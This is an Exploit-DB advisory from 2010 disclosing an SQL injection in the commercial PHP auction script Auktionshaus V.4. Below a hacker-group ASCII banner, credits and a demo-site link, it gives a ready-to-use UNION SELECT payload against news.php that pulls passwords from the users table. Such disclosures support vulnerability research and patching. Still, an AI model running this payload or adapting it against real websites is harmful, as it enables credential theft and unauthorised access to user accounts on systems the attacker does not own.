Auktionshaus 4 - news.php SQL Injection Vulnerability

2010-02-17T00:00:00
ID EDB-ID:11487
Type exploitdb
Reporter Easy Laster
Modified 2010-02-17T00:00:00

Description

Auktionshaus v.4 news.php SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                             ########################################################################
 ##Auktionshaus V.4 SQL Injection news.php                             ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: Auktionshaus V.4]                                               #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ buy this script ]                                           #
#Founder: [ ea$y laster ]                                                #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-]                       #                                              #
#Price: [ Commercial License EUR 89,99                                   #
#DEMO : http://demo3.dolorez.de/                                         #
############################################################################
#http://server/news.php?id=-1+union+select+1,2,password,4,5+from+users--#                                        #
############################################################################